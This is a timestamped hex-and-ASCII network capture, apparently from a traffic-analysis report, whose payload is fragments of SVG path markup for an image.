                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC194INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                                                        Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC210INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                                                        Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC226INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC226INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                                                        Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC242INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC258INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                                        Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC274INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                                                        Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC290INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC306INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC322INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC338INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC354INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC370INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC386INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                                                        Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC402INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC418INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC434INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC450INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
